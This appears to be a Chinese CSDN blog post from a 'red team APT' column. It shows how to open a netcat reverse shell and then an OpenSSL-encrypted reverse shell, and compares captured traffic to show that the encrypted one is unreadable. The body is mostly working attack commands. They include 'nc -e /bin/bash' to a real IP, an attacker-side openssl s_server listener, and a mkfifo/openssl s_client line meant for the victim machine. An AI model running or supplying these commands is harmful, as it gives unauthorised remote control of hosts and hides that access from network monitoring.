NC--介绍-未加密&加密后-流量抓包对比

最新推荐文章于 2024-07-08 16:37:01 发布
最新推荐文章于 2024-07-08 16:37:01 发布
阅读量453 收藏 8
点赞数 7
分类专栏: # 红队APT 文章标签: 网络安全 安全 系统安全 web安全 安全架构 可信计算技术 安全威胁分析
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/2303_80857229/article/details/139940311
版权

免责声明:本节仅做技术交流与学习...

目录

介绍:

用法:

 未加密--流量抓包

加密:

攻击端

靶机 

抓包分析:

介绍:

nc 是一个Linux环境下常用的工具命令,可以用来帮助开发者查询和解决网路问题,通常被认为是 NetCat 工具的缩写,在网络工具中有“瑞士军刀”的美誉。

nc 在Linux环境下常常是自带的,如果你使用的Linux发行版本没有这个工具也可以自行安装,比如在CentOS上的安装命令就是 yum install nc -y,并且这个工具在Windows上也可以直接下载使用,下载页面地址为 netcat,简约而不简单。

用法:

nc -lvvp 5566 
nc -e /bin/bash 47.94.236.117 5566  

nc -e cmd ip port 

nc -lvvp port   

https://www.cnblogs.com/someone9/p/8667117.html

linux学习之nc工具操作_慕课手记 

网络工具nc的常见功能和用法-CSDN博客 

 未加密--流量抓包

nc -lvvp 5566 
nc -e /bin/bash 47.94.236.117 5566 

 

加密:

攻击端

生成自签名证书 :
openssl req -x509 -newkey rsa:2048 -keyout key.pem -out cert.pem -days 365 -nodes 
--全部回车--(全部默认)


监听指定端口,这里我选择 8888 :
openssl s_server -quiet -key key.pem -cert cert.pem -port 8888

 

 

---监听---上线---执行命令 

靶机 

在受害机上执行 shell 反弹命令(注意修改 ip 和端口) 
mkfifo /tmp/s; /bin/sh -i < /tmp/s 2>&1 | openssl s_client -quiet -connect 47.94.236.117:8888 > /tmp/s;

 

抓包分析:

 ---数据都被加密了.

 

金灰
关注
  • 7
    点赞
  • 8
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
iOS实现HTTP认证之摘要认证-Digest
a1661408343的博客
09-04 611
收录:shenshi_bing 什么是Digest? 摘要访问认证是一种协议规定的Web服务器用来同网页浏览器进行认证信息协商的方法。它在密码发出前,先对其应用哈希函数,这相对于HTTP基本认证发送明文而言,更安全。 从技术上讲,摘要认证是使用随机数来阻止进行密码分析的MD5加密哈希函数应用. 1. 基本流程 客户端发起GET(PUT、POST、DELETE…)请求 服务器响应401 Unauthorized,WWW-Authenticate指定认证算法,realm指定安全域 客户端重新发起请求,Auth
shell命令之nc所有用法+网络抓包
qq_30531921的博客
05-17 496
nc用法+总结
ab与nc命令,tcpdump命令
weixin_30477293的博客
12-01 204
ab与nc命令,tcpdump命令 ab -p post.txt -T application/json "http://127.0.0.1:8083/main/index" 模拟向url发出一个post请求 nc -l 9999  监听本地9999端口,相当于模拟一个简单服务器,接收一次连接后就会断开 nc -lk 9999  同上,但断开后会重新连接 nc 12...
Linux Netcat 命令——网络工具中的瑞士军刀
Leo Zhang
04-11 2539
netcat是网络工具中的瑞士军刀,它能通过TCP和UDP在网络中读写数据。通过与其他工具结合和重定向,你可以在脚本中以多种方式使用它。使用netcat命令所能完成的事情令人惊讶。 netcat所做的就是在两台电脑之间建立链接并返回两个数据流,在这之后所能做的事就看你的想像力了。你能建立一个服务器,传输文件,与朋友聊天,传输流媒体或者用它作为其它协议的独立客户端。 下面是一些使用netcat的
03wireshark实践——抓包对比ncncat之间不加密加密流量的区别
Wittengenstein的博客
10-04 1819
环境 Ubuntu18.04 Kali Linux:5.2.9-2kali1 ncncat的区别 nc 不能对流量进行加密,在传输过程中都是明文传输,能够被嗅探 ncat ncat属于nmap工具包 ncat可以对数据包的传输进行ssl管道加密,即使被抓到包后,但由于已经对数据管道进行了加密,所以看到的信息也是加密过得,不易破解 实验演示 nc加密的情况抓包演示 1.先查看...
渗透测试抓包工具-wireshark
分享学习网络的点点滴滴
04-18 5143
wireshark功能介绍1.抓包嗅探协议分析2.安全专家必备的技能3.抓包引擎Libpcap9----LinuxWinpcap10-----Windows4.解码能力   wireshark基本使用方法1.启动软件2.选择抓包网卡3.选择混杂模式4.实施抓包5.保存和分析捕获文件6.首选项(可以定制布局,列表,字体等等功能)   Wireshark筛选器过滤掉干扰的数据包抓包筛选器显示筛选器可以在上图进行一系列的过滤  wir
【红队APT】反朔源&流量加密&CS&MSF&证书指纹&C2项目&CDN域前置
今天是几号的博客
04-18 1890
生成后在虚拟机中上线,不过遇到了奇怪的事情就是,我在上线的虚拟机中抓不到http流量的数据包,而在物理机中抓到了(emmm我也不太懂为什么会这样)红队进行权限控制,主机开始限制出网,尝试走常见出网协议http/https,结果流量设备入侵检测检测系统发现异常,尝试修改工具指纹特征加密流量防止检测,结果被定位到控制服务器,这里可以看到msf自带的证书,这里我们对该证书进行伪装(这里其实流量上没做什么改变,知识对默认证书指纹做了修改)这里可以看到,流量进行了加密,只能隐约的看到一些ssl证书信息。
Linux - nc命令参数及用法详解--功能超级强大的网络工具netcat
猫咪控丶的博客
05-21 9973
参考 :http://www.linuxso.com/command/nc.html NC 全名 Netcat (网络刀),作者是 Hobbit && ChrisWysopal。因其功能十分强大,体积小巧而出名,又被大家称为“瑞士军刀”。nc - TCP/IP swiss army knife 1.ncnc 常用于溢出、反向链接、上传文本等。其实是一个非标准的 telnet 客户端程序。也是一个 putty.exe 客户端程序。 2.socat:socat 是一个 n...
图文介绍——NC使用笔记
LainWith的博客
01-20 7411
NC 简介 Netcat 简称为nc,中文名网猫,被誉为网络工具中的瑞士军刀。具备以下功能: 侦听模式/传输模式 telnet/获取 banner信息(当作telent工具使用,甚至更好用) 传输文本信息(可以作为聊天工具) 传输文件/目录 加密传输文件 远程控制/木马(一般来说,不会被查杀) 加密所有流量 流媒体服务器 远程克隆硬盘(一般用作电子取证) nc 有很多变种。不同的变种,会在原有 nc 的基础上增加一些新功能。比较流行的变种之一是OpenBSD 社区的变种(也叫“OpenBSD netc
Network Controller Sideband Interface(NC-SI)Specification
08-31
本资源包含两个文档,一个是最新的Network Controller Sideband Interface(NC-SI)SpecificationV1.1.0官方发布版本,一个是2022年5月的最新版本Network Controller Sideband Interface(NC-SI)SpecificationV1.2WIP90...
用友NC-UAP平台介绍
11-09
UAP平台介绍,产业背景、平台整体介绍、UAP平台介绍、平台性能与稳定性、平台产业链与典型客户
诺基亚NC-12功率因数控制器说明书.pdf
04-10
诺基亚NC-12功率因数控制器说明书,通过学习本文件,可对诺基亚NC-12功率因数控制器有较深理解,有助于现场施工
Network Controller Sideband Interface (NC-SI) Specification
07-02
Network Controller Sideband Interface (NC-SI) Specification Network Controller Sideband Interface (NC-SI) Specification是Distributed Management Task Force (DMTF)发布的一份规范文档,该规范定义了...
netCDF4.9.2-NC4-64.exe
03-07
netCDF4.9.2-NC4-64.exe
一文解读,网络安全行业人才需求情况《网络安全产业人才发展报告》
weixin_59086772的博客
10-18 8328
随着近几天国家网络安全宣传周在全国各地开展活动,网络安全再一次成为热门话题。网络安全不再缩在小小的安全圈子里,惠及面越来越广。不少对网络安全颇有兴趣的朋友非常关心行业前景如何?该怎么提升自我能力,更快地加入网安行列。 今天雨笋君就10月13日在网络安全宣传周上发布的《2021网络安全人才报告》进行一个简单的行业前景分析。 一、网络安全行业市场发展情况 网络时代生活越来越离不开网络,与此同时发生的网络安全攻击事件、非法入侵等等一系列事件都威胁着普通人的生活。没有网络安全保障,个人和企业等重.
亚信安全发布2024年6月威胁态势,高危漏洞猛增60%
亚信安全官方账号的博客
07-04 311
亚信安全发布2024年6月威胁态势
警钟!电池储能安全事故频发!物联网技术如何加强储能安全排查?
最新发布
olzorange的博客
07-08 151
物联网技术的应用为储能安全排查提供了从源头预防到快速响应的全链条解决方案。
2022年某软件公司NC-V56供应链改进功能(共84张PPT).pptx
11-17
2022年某软件公司NC-V56供应链改进功能(共84张PPT).pptx

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

金灰

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值